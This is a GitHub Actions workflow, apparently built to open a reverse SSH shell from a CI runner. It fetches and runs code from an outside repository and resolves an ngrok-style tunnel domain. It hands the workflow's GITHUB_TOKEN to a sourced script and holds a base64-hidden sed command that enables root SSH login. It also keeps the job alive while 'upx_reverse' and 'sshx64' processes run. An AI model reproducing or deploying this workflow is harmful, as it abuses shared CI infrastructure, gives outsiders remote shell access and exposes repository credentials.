# This is a basic workflow to help you get started with Actions

name: revSSH_2023_0805-nogit

# Controls when the workflow will run
on:
    # Triggers the workflow on push or pull request events but only for the main branch
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:
    inputs:
      name77:
        description: 'PersonDesc'
        required: true
        default: 'AABBCC_rev_shell'

    
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build_jobs3:
    # The type of runner that the job will run on
    runs-on: ubuntu-20.04
    #ubuntu-latest  18.04 20.04  22.04
    #container: 'centos:latest'
    #services:
      #redis:
       # image: redis
        #ports:
        #- 6379/tcp
    

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      - name: Run a one-line script
        run: |
          cat /etc/hostname;
          pwd;
          git clone https://github.com/189er/nc_test;
          hostname -i;
          echo ${{ toJson(github.event.action) }};
          echo ${{github.event.inputs}};
          #echo toJson(${{ github.event.inputs }});
          #echo ${github.event.inputs};
          #(env|grep ss>/tmp/s0;sleep 1111&);
          ls -al;#echo 1234567;
          mv nc_test/* ./;
          ls -al nc_test;          
          chmod 0777 $GITHUB_WORKSPACE/*;chmod 0777 $GITHUB_WORKSPACE/tool/*;
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"
      # Runs a set of commands using the runners shell
      - name: Run a 2-line script
        run: |
          echo "${{github.workspace}}--${{ runner.workspace }}--${{env.IMAGE_NAME}}--${{ github.run_id }}--${{ github.run_number }}--${{env.IMAGE_TAG}}";
          date;
          sudo cp ./busybox.bin /sbin/busybox;
          busybox nslookup ngrok.xiaomiqiu123.top 114.114.114.114 |grep -v 114.114.114.114;
          ls -al /run/user/;
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc8"
      # Runs a set of commands using the runners shell

      - name: Run a multi-line script
        run: |
          cd /tmp;
          echo "${{ toJson(github.event.inputs) }}"|base64 -w0 >js8;
          base64 -d js8>js9;
          #env|grep ss>s1;
          . $GITHUB_WORKSPACE/ghub.sh;
        env:
          sshc1: 'cat /proc/uptime|cut -f1 -d"."'
          Github_Token22: ${{ secrets.GITHUB_TOKEN }}
          Github_act22: ${{ github.event.action }}
          Github_OWN22: ${{ github.repository_owner }}
          Github_REPO22: ${{ github.event.repository.name }}
          Github_wsp22: ${{github.workspace}}
          sp9: 3
          TZ: Asia/Shanghai
      - name: Run a 3rd script #cat /tmp/y1;echo liuhuan88;cat /tmp/y2;cat /tmp/y1;
        run: |
          bash -c '(ls -al $GITHUB_WORKSPACE)';
          ls -al /tmp;
          pwd;
          sleep 2;
          sudo netstat -anlp|grep tcp;
          sudo ps aux|grep ssh;
          grep NAME /etc/os-release;
          #cat /tmp/y2;
          #echo "ping success"
        env:
          sp9: 4
          TZ: Asia/Shanghai
      - name: Run a 4rd script #[ ${rt} -gt 15 ]&&whoami&&break;  #[ $((${rt}%80)) -eq 0 ]&&  #rt=$((${rt}+1));
        run: |
          cd /tmp;
          rt=0;
          while true
          do 
            date;
            uptime;
            rt=$((${rt}+1));
            #sudo id|grep ro;
            [ -f /tmp/keepalive ]&&cat /tmp/keepalive&&sudo netstat -anlp|grep upx_reverse;
            sudo ps aux|grep sshx64|grep -v keepalive;
            #sudo busybox netstat -anlp|grep 34292;
            [ -f /tmp/keepalive ]&&sleep 10||break;
          done 
        env:
            sp9: 4
            TZ: Asia/Shanghai   



  # build_jobs8:    
  #   needs: build_jobs3
  #   runs-on: ubuntu-22.04
  #   steps:
  #     - name: Run a 8rd script
  #       run: 
  #         bash -c '(ls -al /tmp;date;ls -alR $GITHUB_WORKSPACE;)' 
  #       env:
  #         sp9: 2
  #         TZ: Asia/Shanghai

  #     - uses: actions/download-artifact@v3
  #       with:
  #        name: nuget123
  #        path: ${{ github.workspace }}/package
  #       name: "Upload Package9982"
  #     - name: Run a 9rd script
  #       run: |
  #         bash -c '(ls -alR $GITHUB_WORKSPACE)' 
  #         id
  #       env:
  #         sp9: 1
  #         TZ: Asia/Shanghai

